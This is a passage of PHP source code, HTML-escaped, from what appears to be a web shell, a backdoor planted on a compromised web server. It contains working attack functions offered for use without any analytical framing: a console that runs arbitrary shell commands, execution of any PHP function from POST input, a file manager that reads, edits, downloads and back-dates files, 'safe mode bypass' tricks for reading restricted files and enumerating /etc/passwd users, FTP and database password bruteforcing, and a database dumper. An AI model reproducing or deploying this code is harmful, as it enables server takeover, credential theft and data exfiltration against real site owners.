    if(!empty($_POST['p1'])) { 
        if(function_exists($_POST['p1'])) 
        echo htmlspecialchars($_POST['p1']($_POST['p2'])); 
    } 
    echo"&amp;lt;/pre&amp;gt;&amp;lt;/div&amp;gt;"; 
    ?&amp;gt; 
    &amp;lt;br&amp;gt;&amp;lt;h1&amp;gt;Search for hash:&amp;lt;/h1&amp;gt;&amp;lt;div class=content&amp;gt; 
        &amp;lt;form method='post' target='_blank' name="hf"&amp;gt; 
            &amp;lt;input type="text" name="hash" style="width:200px;"&amp;gt;&amp;lt;br&amp;gt; 
            &amp;lt;input type="button" value="hashcrack.com" onclick="document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()"&amp;gt;&amp;lt;br&amp;gt; 
            &amp;lt;input type="button" value="milw0rm.com" onclick="document.hf.action='http://www.milw0rm.com/cracker/search.php';document.hf.submit()"&amp;gt;&amp;lt;br&amp;gt; 
            &amp;lt;input type="button" value="hashcracking.info" onclick="document.hf.action='https://hashcracking.info/index.php';document.hf.submit()"&amp;gt;&amp;lt;br&amp;gt; 
            &amp;lt;input type="button" value="md5.rednoize.com" onclick="document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&amp;amp;s=md5';document.hf.submit()"&amp;gt;&amp;lt;br&amp;gt; 
            &amp;lt;input type="button" value="md5decrypter.com" onclick="document.hf.action='http://www.md5decrypter.com/';document.hf.submit()"&amp;gt;&amp;lt;br&amp;gt; 
        &amp;lt;/form&amp;gt; 
    &amp;lt;/div&amp;gt; 
    &amp;lt;?php 
    printFooter(); 
} 

function actionFilesTools() { 
    if( isset($_POST['p1']) ) 
        $_POST['p1'] = urldecode($_POST['p1']); 
    if(@$_POST['p2']=='download') { 
        if(is_file($_POST['p1']) &amp;amp;&amp;amp; is_readable($_POST['p1'])) { 
            ob_start("ob_gzhandler", 4096); 
            header("Content-Disposition: attachment; filename=".basename($_POST['p1'])); 
            if (function_exists("mime_content_type")) { 
                $type = @mime_content_type($_POST['p1']); 
                header("Content-Type: ".$type); 
            } 
            $fp = @fopen($_POST['p1'], "r"); 
            if($fp) { 
                while(!@feof($fp)) 
                    echo @fread($fp, 1024); 
                fclose($fp); 
            } 
        } elseif(is_dir($_POST['p1']) &amp;amp;&amp;amp; is_readable($_POST['p1'])) { 

        } 
        exit; 
    } 
    if( @$_POST['p2'] == 'mkfile' ) { 
        if(!file_exists($_POST['p1'])) { 
            $fp = @fopen($_POST['p1'], 'w'); 
            if($fp) { 
                $_POST['p2'] = "edit"; 
                fclose($fp); 
            } 
        } 
    } 
    printHeader(); 
    echo '&amp;lt;h1&amp;gt;File tools&amp;lt;/h1&amp;gt;&amp;lt;div class=content&amp;gt;'; 
    if( !file_exists(@$_POST['p1']) ) { 
        echo 'File not exists'; 
        printFooter(); 
        return; 
    } 
    $uid = @posix_getpwuid(@fileowner($_POST['p1'])); 
    $gid = @posix_getgrgid(@fileowner($_POST['p1'])); 
    echo '&amp;lt;span&amp;gt;Name:&amp;lt;/span&amp;gt; '.htmlspecialchars($_POST['p1']).' &amp;lt;span&amp;gt;Size:&amp;lt;/span&amp;gt; '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' &amp;lt;span&amp;gt;Permission:&amp;lt;/span&amp;gt; '.viewPermsColor($_POST['p1']).' &amp;lt;span&amp;gt;Owner/Group:&amp;lt;/span&amp;gt; '.$uid['name'].'/'.$gid['name'].'&amp;lt;br&amp;gt;'; 
    echo '&amp;lt;span&amp;gt;Create time:&amp;lt;/span&amp;gt; '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' &amp;lt;span&amp;gt;Access time:&amp;lt;/span&amp;gt; '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' &amp;lt;span&amp;gt;Modify time:&amp;lt;/span&amp;gt; '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;'; 
    if( empty($_POST['p2']) ) 
        $_POST['p2'] = 'view'; 
    if( is_file($_POST['p1']) ) 
        $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); 
    else 
        $m = array('Chmod', 'Rename', 'Touch'); 
    foreach($m as $v) 
        echo '&amp;lt;a href=# onclick="g(null,null,null,\''.strtolower($v).'\')"&amp;gt;'.((strtolower($v)==@$_POST['p2'])?'&amp;lt;b&amp;gt;[ '.$v.' ]&amp;lt;/b&amp;gt;':$v).'&amp;lt;/a&amp;gt; '; 
    echo '&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;'; 
    switch($_POST['p2']) { 
        case 'view': 
            echo '&amp;lt;pre class=ml1&amp;gt;'; 
            $fp = @fopen($_POST['p1'], 'r'); 
            if($fp) { 
                while( !@feof($fp) ) 
                    echo htmlspecialchars(@fread($fp, 1024)); 
                @fclose($fp); 
            } 
            echo '&amp;lt;/pre&amp;gt;'; 
            break; 
        case 'highlight': 
            if( is_readable($_POST['p1']) ) { 
                echo '&amp;lt;div class=ml1 style="background-color: #e1e1e1;color:black;"&amp;gt;'; 
                $code = highlight_file($_POST['p1'],true); 
                echo str_replace(array('&amp;lt;span ','&amp;lt;/span&amp;gt;'), array('&amp;lt;font ','&amp;lt;/font&amp;gt;'),$code).'&amp;lt;/div&amp;gt;'; 
            } 
            break; 
        case 'chmod': 
            if( !empty($_POST['p3']) ) { 
                $perms = 0; 
                for($i=strlen($_POST['p3'])-1;$i&amp;gt;=0;--$i) 
                    $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); 
                if(!@chmod($_POST['p1'], $perms)) 
                    echo 'Can\'t set permissions!&amp;lt;br&amp;gt;&amp;lt;script&amp;gt;document.mf.p3.value="";&amp;lt;/script&amp;gt;'; 
                else 
                    die('&amp;lt;script&amp;gt;g(null,null,null,null,"")&amp;lt;/script&amp;gt;'); 
            } 
            echo '&amp;lt;form onsubmit="g(null,null,null,null,this.chmod.value);return false;"&amp;gt;&amp;lt;input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"&amp;gt;&amp;lt;input type=submit value="&amp;gt;&amp;gt;"&amp;gt;&amp;lt;/form&amp;gt;'; 
            break; 
        case 'edit': 
            if( !is_writable($_POST['p1'])) { 
                echo 'File isn\'t writeable'; 
                break; 
            } 
            if( !empty($_POST['p3']) ) { 
                @file_put_contents($_POST['p1'],$_POST['p3']); 
                echo 'Saved!&amp;lt;br&amp;gt;&amp;lt;script&amp;gt;document.mf.p3.value="";&amp;lt;/script&amp;gt;'; 
            } 
            echo '&amp;lt;form onsubmit="g(null,null,null,null,this.text.value);return false;"&amp;gt;&amp;lt;textarea name=text class=bigarea&amp;gt;'; 
            $fp = @fopen($_POST['p1'], 'r'); 
            if($fp) { 
                while( !@feof($fp) ) 
                    echo htmlspecialchars(@fread($fp, 1024)); 
                @fclose($fp); 
            } 
            echo '&amp;lt;/textarea&amp;gt;&amp;lt;input type=submit value="&amp;gt;&amp;gt;"&amp;gt;&amp;lt;/form&amp;gt;'; 
            break; 
        case 'hexdump': 
            $c = @file_get_contents($_POST['p1']); 
            $n = 0; 
            $h = array('00000000&amp;lt;br&amp;gt;','',''); 
            $len = strlen($c); 
            for ($i=0; $i&amp;lt;$len; ++$i) { 
                $h[1] .= sprintf('%02X',ord($c[$i])).' '; 
                switch ( ord($c[$i]) ) { 
                    case 0:  $h[2] .= ' '; break; 
                    case 9:  $h[2] .= ' '; break; 
                    case 10: $h[2] .= ' '; break; 
                    case 13: $h[2] .= ' '; break; 
                    default: $h[2] .= $c[$i]; break; 
                } 
                $n++; 
                if ($n == 32) { 
                    $n = 0; 
                    if ($i+1 &amp;lt; $len) {$h[0] .= sprintf('%08X',$i+1).'&amp;lt;br&amp;gt;';} 
                    $h[1] .= '&amp;lt;br&amp;gt;'; 
                    $h[2] .= "\n"; 
                } 
             } 
            echo '&amp;lt;table cellspacing=1 cellpadding=5 bgcolor=#222222&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td bgcolor=#333333&amp;gt;&amp;lt;span style="font-weight: normal;"&amp;gt;&amp;lt;pre&amp;gt;'.$h[0].'&amp;lt;/pre&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;td bgcolor=#282828&amp;gt;&amp;lt;pre&amp;gt;'.$h[1].'&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;td bgcolor=#333333&amp;gt;&amp;lt;pre&amp;gt;'.htmlspecialchars($h[2]).'&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;'; 
            break; 
        case 'rename': 
            if( !empty($_POST['p3']) ) { 
                if(!@rename($_POST['p1'], $_POST['p3'])) 
                    echo 'Can\'t rename!&amp;lt;br&amp;gt;&amp;lt;script&amp;gt;document.mf.p3.value="";&amp;lt;/script&amp;gt;'; 
                else 
                    die('&amp;lt;script&amp;gt;g(null,null,"'.urlencode($_POST['p3']).'",null,"")&amp;lt;/script&amp;gt;'); 
            } 
            echo '&amp;lt;form onsubmit="g(null,null,null,null,this.name.value);return false;"&amp;gt;&amp;lt;input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"&amp;gt;&amp;lt;input type=submit value="&amp;gt;&amp;gt;"&amp;gt;&amp;lt;/form&amp;gt;'; 
            break; 
        case 'touch': 
            if( !empty($_POST['p3']) ) { 
                $time = strtotime($_POST['p3']); 
                if($time) { 
                    if(@touch($_POST['p1'],$time,$time)) 
                        die('&amp;lt;script&amp;gt;g(null,null,null,null,"")&amp;lt;/script&amp;gt;'); 
                    else { 
                        echo 'Fail!&amp;lt;script&amp;gt;document.mf.p3.value="";&amp;lt;/script&amp;gt;'; 
                    } 
                } else echo 'Bad time format!&amp;lt;script&amp;gt;document.mf.p3.value="";&amp;lt;/script&amp;gt;'; 
            } 
            echo '&amp;lt;form onsubmit="g(null,null,null,null,this.touch.value);return false;"&amp;gt;&amp;lt;input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"&amp;gt;&amp;lt;input type=submit value="&amp;gt;&amp;gt;"&amp;gt;&amp;lt;/form&amp;gt;'; 
            break; 
        case 'mkfile': 
             
            break; 
    } 
    echo '&amp;lt;/div&amp;gt;'; 
    printFooter(); 
} 

function actionSafeMode() { 
    $temp=''; 
    ob_start(); 
    switch($_POST['p1']) { 
        case 1: 
            $temp=@tempnam($test, 'cx'); 
            if(@copy("compress.zlib://".$_POST['p2'], $temp)){ 
                echo @file_get_contents($temp); 
                unlink($temp); 
            } else 
                echo 'Sorry... Can\'t open file'; 
            break; 
        case 2: 
            $files = glob($_POST['p2'].'*'); 
            if( is_array($files) ) 
                foreach ($files as $filename) 
                    echo $filename."\n"; 
            break; 
        case 3: 
            $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH); 
            curl_exec($ch); 
            break; 
        case 4: 
            ini_restore("safe_mode"); 
            ini_restore("open_basedir"); 
            include($_POST['p2']); 
            break; 
        case 5: 
            for(;$_POST['p2'] &amp;lt;= $_POST['p3'];$_POST['p2']++) { 
                $uid = @posix_getpwuid($_POST['p2']); 
                if ($uid) 
                    echo join(':',$uid)."\n"; 
            } 
            break; 
        case 6: 
            if(!function_exists('imap_open'))break; 
            $stream = imap_open($_POST['p2'], "", ""); 
            if ($stream == FALSE) 
                break; 
            echo imap_body($stream, 1); 
            imap_close($stream); 
            break; 
    } 
    $temp = ob_get_clean(); 
    printHeader(); 
    echo '&amp;lt;h1&amp;gt;Safe mode bypass&amp;lt;/h1&amp;gt;&amp;lt;div class=content&amp;gt;'; 
    echo '&amp;lt;span&amp;gt;Copy (read file)&amp;lt;/span&amp;gt;&amp;lt;form onsubmit=\'g(null,null,"1",this.param.value);return false;\'&amp;gt;&amp;lt;input type=text name=param&amp;gt;&amp;lt;input type=submit value="&amp;gt;&amp;gt;"&amp;gt;&amp;lt;/form&amp;gt;&amp;lt;br&amp;gt;&amp;lt;span&amp;gt;Glob (list dir)&amp;lt;/span&amp;gt;&amp;lt;form onsubmit=\'g(null,null,"2",this.param.value);return false;\'&amp;gt;&amp;lt;input type=text name=param&amp;gt;&amp;lt;input type=submit value="&amp;gt;&amp;gt;"&amp;gt;&amp;lt;/form&amp;gt;&amp;lt;br&amp;gt;&amp;lt;span&amp;gt;Curl (read file)&amp;lt;/span&amp;gt;&amp;lt;form onsubmit=\'g(null,null,"3",this.param.value);return false;\'&amp;gt;&amp;lt;input type=text name=param&amp;gt;&amp;lt;input type=submit value="&amp;gt;&amp;gt;"&amp;gt;&amp;lt;/form&amp;gt;&amp;lt;br&amp;gt;&amp;lt;span&amp;gt;Ini_restore (read file)&amp;lt;/span&amp;gt;&amp;lt;form onsubmit=\'g(null,null,"4",this.param.value);return false;\'&amp;gt;&amp;lt;input type=text name=param&amp;gt;&amp;lt;input type=submit value="&amp;gt;&amp;gt;"&amp;gt;&amp;lt;/form&amp;gt;&amp;lt;br&amp;gt;&amp;lt;span&amp;gt;Posix_getpwuid ("Read" /etc/passwd)&amp;lt;/span&amp;gt;&amp;lt;table&amp;gt;&amp;lt;form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;From&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;&amp;lt;input type=text name=param1 value=0&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;To&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;&amp;lt;input type=text name=param2 value=1000&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;&amp;lt;input type=submit value="&amp;gt;&amp;gt;"&amp;gt;&amp;lt;/form&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;span&amp;gt;Imap_open (read file)&amp;lt;/span&amp;gt;&amp;lt;form onsubmit=\'g(null,null,"6",this.param.value);return false;\'&amp;gt;&amp;lt;input type=text name=param&amp;gt;&amp;lt;input type=submit value="&amp;gt;&amp;gt;"&amp;gt;&amp;lt;/form&amp;gt;'; 
    if($temp) 
        echo '&amp;lt;pre class="ml1" style="margin-top:5px" id="Output"&amp;gt;'.$temp.'&amp;lt;/pre&amp;gt;'; 
    echo '&amp;lt;/div&amp;gt;'; 
    printFooter(); 
} 

function actionConsole() { 
    if(isset($_POST['ajax'])) { 
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true; 
        ob_start(); 
        echo "document.cf.cmd.value='';\n"; 
        $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'\0")); 
        if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match))    { 
            if(@chdir($match[1])) { 
                $GLOBALS['cwd'] = @getcwd(); 
                echo "document.mf.c.value='".$GLOBALS['cwd']."';"; 
            } 
        } 
        echo "document.cf.output.value+='".$temp."';"; 
        echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;"; 
        $temp = ob_get_clean(); 
        echo strlen($temp), "\n", $temp; 
        exit; 
    } 
    printHeader(); 
?&amp;gt; 
&amp;lt;script&amp;gt; 
if(window.Event) window.captureEvents(Event.KEYDOWN); 
var cmds = new Array(""); 
var cur = 0; 
function kp(e) { 
    var n = (window.Event) ? e.which : e.keyCode; 
    if(n == 38) { 
        cur--; 
        if(cur&amp;gt;=0) 
            document.cf.cmd.value = cmds[cur]; 
        else 
            cur++; 
    } else if(n == 40) { 
        cur++; 
        if(cur &amp;lt; cmds.length) 
            document.cf.cmd.value = cmds[cur]; 
        else 
            cur--; 
    } 
} 
function add(cmd) { 
    cmds.pop(); 
    cmds.push(cmd); 
    cmds.push(""); 
    cur = cmds.length-1; 
} 
&amp;lt;/script&amp;gt; 
&amp;lt;?php 
    echo '&amp;lt;h1&amp;gt;Console&amp;lt;/h1&amp;gt;&amp;lt;div class=content&amp;gt;&amp;lt;form name=cf onsubmit="if(document.cf.cmd.value==\'clear\'){document.cf.output.value=\'\';document.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return false;"&amp;gt;&amp;lt;select name=alias&amp;gt;'; 
    foreach($GLOBALS['aliases'] as $n =&amp;gt; $v) { 
        if($v == '') { 
            echo '&amp;lt;optgroup label="-'.htmlspecialchars($n).'-"&amp;gt;&amp;lt;/optgroup&amp;gt;'; 
            continue; 
        } 
        echo '&amp;lt;option value="'.htmlspecialchars($v).'"&amp;gt;'.$n.'&amp;lt;/option&amp;gt;'; 
    } 
    if(empty($_POST['ajax'])&amp;amp;&amp;amp;!empty($_POST['p1'])) 
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false; 
    echo '&amp;lt;/select&amp;gt;&amp;lt;input type=button onclick="add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value);}else{g(null,null,document.cf.alias.value);}" value="&amp;gt;&amp;gt;"&amp;gt; &amp;lt;input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'&amp;gt; send using AJAX&amp;lt;br/&amp;gt;&amp;lt;textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly&amp;gt;'; 
    if(!empty($_POST['p1'])) { 
        echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1'])); 
    } 
    echo '&amp;lt;/textarea&amp;gt;&amp;lt;input type=text name=cmd style="border-top:0;width:100%;margin:0;" onkeydown="kp(event);"&amp;gt;'; 
    echo '&amp;lt;/form&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;script&amp;gt;document.cf.cmd.focus();&amp;lt;/script&amp;gt;'; 
    printFooter(); 
} 

function actionLogout() { 
    unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); 
    echo 'bye!'; 
} 

function actionSelfRemove() { 
    printHeader(); 
    if($_POST['p1'] == 'yes') { 
        if(@unlink(SELF_PATH)) 
            die('Shell has been removed'); 
        else 
            echo 'unlink error!'; 
    } 
    echo '&amp;lt;h1&amp;gt;Suicide&amp;lt;/h1&amp;gt;&amp;lt;div class=content&amp;gt;Really want to remove the shell?&amp;lt;br&amp;gt;&amp;lt;a href=# onclick="g(null,null,\'yes\')"&amp;gt;Yes&amp;lt;/a&amp;gt;&amp;lt;/div&amp;gt;'; 
    printFooter(); 
} 

function actionBruteforce() { 
    printHeader(); 
    if( isset($_POST['proto']) ) { 
        echo '&amp;lt;h1&amp;gt;Results&amp;lt;/h1&amp;gt;&amp;lt;div class=content&amp;gt;&amp;lt;span&amp;gt;Type:&amp;lt;/span&amp;gt; '.htmlspecialchars($_POST['proto']).' &amp;lt;span&amp;gt;Server:&amp;lt;/span&amp;gt; '.htmlspecialchars($_POST['server']).'&amp;lt;br&amp;gt;'; 
        if( $_POST['proto'] == 'ftp' ) { 
            function bruteForce($ip,$port,$login,$pass) { 
                $fp = @ftp_connect($ip, $port?$port:21); 
                if(!$fp) return false; 
                $res = @ftp_login($fp, $login, $pass); 
                @ftp_close($fp); 
                return $res; 
            } 
        } elseif( $_POST['proto'] == 'mysql' ) { 
            function bruteForce($ip,$port,$login,$pass) { 
                $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass); 
                @mysql_close($res); 
                return $res; 
            } 
        } elseif( $_POST['proto'] == 'pgsql' ) { 
            function bruteForce($ip,$port,$login,$pass) { 
                $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=''"; 
                $res = @pg_connect($server[0].':'.$server[1]?$server[1]:5432, $login, $pass); 
                @pg_close($res); 
                return $res; 
            } 
        } 
        $success = 0; 
        $attempts = 0; 
        $server = explode(":", $_POST['server']); 
        if($_POST['type'] == 1) { 
            $temp = @file('/etc/passwd'); 
            if( is_array($temp) ) 
                foreach($temp as $line) { 
                    $line = explode(":", $line); 
                    ++$attempts; 
                    if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { 
                        $success++; 
                        echo '&amp;lt;b&amp;gt;'.htmlspecialchars($line[0]).'&amp;lt;/b&amp;gt;:'.htmlspecialchars($line[0]).'&amp;lt;br&amp;gt;'; 
                    } 
                    if(@$_POST['reverse']) { 
                        $tmp = ""; 
                        for($i=strlen($line[0])-1; $i&amp;gt;=0; --$i) 
                            $tmp .= $line[0][$i]; 
                        ++$attempts; 
                        if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { 
                            $success++; 
                            echo '&amp;lt;b&amp;gt;'.htmlspecialchars($line[0]).'&amp;lt;/b&amp;gt;:'.htmlspecialchars($tmp); 
                        } 
                    } 
                } 
        } elseif($_POST['type'] == 2) { 
            $temp = @file($_POST['dict']); 
            if( is_array($temp) ) 
                foreach($temp as $line) { 
                    $line = trim($line); 
                    ++$attempts; 
                    if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) { 
                        $success++; 
                        echo '&amp;lt;b&amp;gt;'.htmlspecialchars($_POST['login']).'&amp;lt;/b&amp;gt;:'.htmlspecialchars($line).'&amp;lt;br&amp;gt;'; 
                    } 
                } 
        } 
        echo "&amp;lt;span&amp;gt;Attempts:&amp;lt;/span&amp;gt; $attempts &amp;lt;span&amp;gt;Success:&amp;lt;/span&amp;gt; $success&amp;lt;/div&amp;gt;&amp;lt;br&amp;gt;"; 
    } 
    echo '&amp;lt;h1&amp;gt;FTP bruteforce&amp;lt;/h1&amp;gt;&amp;lt;div class=content&amp;gt;&amp;lt;table&amp;gt;&amp;lt;form method=post&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;&amp;lt;span&amp;gt;Type&amp;lt;/span&amp;gt;&amp;lt;/td&amp;gt;' 
        .'&amp;lt;td&amp;gt;&amp;lt;select name=proto&amp;gt;&amp;lt;option value=ftp&amp;gt;FTP&amp;lt;/option&amp;gt;&amp;lt;option value=mysql&amp;gt;MySql&amp;lt;/option&amp;gt;&amp;lt;option value=pgsql&amp;gt;PostgreSql&amp;lt;/option&amp;gt;&amp;lt;/select&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;' 
        .'&amp;lt;input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'"&amp;gt;' 
        .'&amp;lt;input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'"&amp;gt;' 
        .'&amp;lt;input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'"&amp;gt;' 
        .'&amp;lt;span&amp;gt;Server:port&amp;lt;/span&amp;gt;&amp;lt;/td&amp;gt;' 
        .'&amp;lt;td&amp;gt;&amp;lt;input type=text name=server value="127.0.0.1"&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;' 
        .'&amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;&amp;lt;span&amp;gt;Brute type&amp;lt;/span&amp;gt;&amp;lt;/td&amp;gt;' 
        .'&amp;lt;td&amp;gt;&amp;lt;label&amp;gt;&amp;lt;input type=radio name=type value="1" checked&amp;gt; /etc/passwd&amp;lt;/label&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;' 
        .'&amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;&amp;lt;label style="padding-left:15px"&amp;gt;&amp;lt;input type=checkbox name=reverse value=1 checked&amp;gt; reverse (login -&amp;gt; nigol)&amp;lt;/label&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;' 
        .'&amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;&amp;lt;label&amp;gt;&amp;lt;input type=radio name=type value="2"&amp;gt; Dictionary&amp;lt;/label&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;' 
        .'&amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;&amp;lt;table style="padding-left:15px"&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;&amp;lt;span&amp;gt;Login&amp;lt;/span&amp;gt;&amp;lt;/td&amp;gt;' 
        .'&amp;lt;td&amp;gt;&amp;lt;input type=text name=login value="komsen"&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;' 
        .'&amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;&amp;lt;span&amp;gt;Dictionary&amp;lt;/span&amp;gt;&amp;lt;/td&amp;gt;' 
        .'&amp;lt;td&amp;gt;&amp;lt;input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;' 
        .'&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;&amp;lt;input type=submit value="&amp;gt;&amp;gt;"&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/form&amp;gt;&amp;lt;/table&amp;gt;'; 
    echo '&amp;lt;/div&amp;gt;&amp;lt;br&amp;gt;'; 
    printFooter(); 
} 

function actionSql() { 
    class DbClass { 
        var $type; 
        var $link; 
        var $res; 
        function DbClass($type)    { 
            $this-&amp;gt;type = $type; 
        } 
        function connect($host, $user, $pass, $dbname){ 
            switch($this-&amp;gt;type)    { 
                case 'mysql': 
                    if( $this-&amp;gt;link = @mysql_connect($host,$user,$pass,true) ) return true; 
                    break; 
                case 'pgsql': 
                    $host = explode(':', $host); 
                    if(!$host[1]) $host[1]=5432; 
                    if( $this-&amp;gt;link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; 
                    break; 
            } 
            return false; 
        } 
        function selectdb($db) { 
            switch($this-&amp;gt;type)    { 
                case 'mysql': 
                    if (@mysql_select_db($db))return true; 
                    break; 
            } 
            return false; 
        } 
        function query($str) { 
            switch($this-&amp;gt;type) { 
                case 'mysql': 
                    return $this-&amp;gt;res = @mysql_query($str); 
                    break; 
                case 'pgsql': 
                    return $this-&amp;gt;res = @pg_query($this-&amp;gt;link,$str); 
                    break; 
            } 
            return false; 
        } 
        function fetch() { 
            $res = func_num_args()?func_get_arg(0):$this-&amp;gt;res; 
            switch($this-&amp;gt;type)    { 
                case 'mysql': 
                    return @mysql_fetch_assoc($res); 
                    break; 
                case 'pgsql': 
                    return @pg_fetch_assoc($res); 
                    break; 
            } 
            return false; 
        } 
        function listDbs() { 
            switch($this-&amp;gt;type)    { 
                case 'mysql': 
                    return $this-&amp;gt;res = @mysql_list_dbs($this-&amp;gt;link); 
                break; 
                case 'pgsql': 
                    return $this-&amp;gt;res = $this-&amp;gt;query("SELECT datname FROM pg_database"); 
                break; 
            } 
            return false; 
        } 
        function listTables() { 
            switch($this-&amp;gt;type)    { 
                case 'mysql': 
                    return $this-&amp;gt;res = $this-&amp;gt;query('SHOW TABLES'); 
                break; 
                case 'pgsql': 
                    return $this-&amp;gt;res = $this-&amp;gt;query("select table_name from information_schema.tables where (table_schema != 'information_schema' AND table_schema != 'pg_catalog') or table_name = 'pg_user'"); 
                break; 
            } 
            return false; 
        } 
        function error() { 
            switch($this-&amp;gt;type)    { 
                case 'mysql': 
                    return @mysql_error($this-&amp;gt;link); 
                break; 
                case 'pgsql': 
                    return @pg_last_error($this-&amp;gt;link); 
                break; 
            } 
            return false; 
        } 
        function setCharset($str) { 
            switch($this-&amp;gt;type)    { 
                case 'mysql': 
                    if(function_exists('mysql_set_charset')) 
                        return @mysql_set_charset($str, $this-&amp;gt;link); 
                    else 
                        $this-&amp;gt;query('SET CHARSET '.$str); 
                    break; 
                case 'mysql': 
                    return @pg_set_client_encoding($this-&amp;gt;link, $str); 
                    break; 
            } 
            return false; 
        } 
        function dump($table) { 
            switch($this-&amp;gt;type)    { 
                case 'mysql': 
                    $res = $this-&amp;gt;query('SHOW CREATE TABLE `'.$table.'`'); 
                    $create = mysql_fetch_array($res); 
                    echo $create[1].";\n\n"; 
                    $this-&amp;gt;query('SELECT * FROM `'.$table.'`'); 
                    while($item = $this-&amp;gt;fetch()) { 
                        $columns = array(); 
                        foreach($item as $k=&amp;gt;$v) { 
                            $item[$k] = "'".@mysql_real_escape_string($v)."'"; 
                            $columns[] = "`".$k."`"; 
                        } 
                    echo 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n"; 
                    } 
                break; 
                case 'pgsql': 
                    $this-&amp;gt;query('SELECT * FROM '.$table); 
                    while($item = $this-&amp;gt;fetch()) { 
                        $columns = array(); 
                        foreach($item as $k=&amp;gt;$v) { 
                            $item[$k] = "'".addslashes($v)."'"; 
                            $columns[] = $k; 
                        } 
                    echo 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n"; 
                    } 
                break; 
            } 
            return false; 
        } 
    }; 
    $db = new DbClass($_POST['type']); 
    if(@$_POST['p2']=='download') { 
        ob_start("ob_gzhandler", 4096); 
        $db-&amp;gt;connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); 
        $db-&amp;gt;selectdb($_POST['sql_base']); 
        header("Content-Disposition: attachment; filename=dump.sql"); 
        header("Content-Type: text/plain"); 
        foreach($_POST['tbl'] as $v) 
                $db-&amp;gt;dump($v); 
        exit; 
    } 
    printHeader(); 
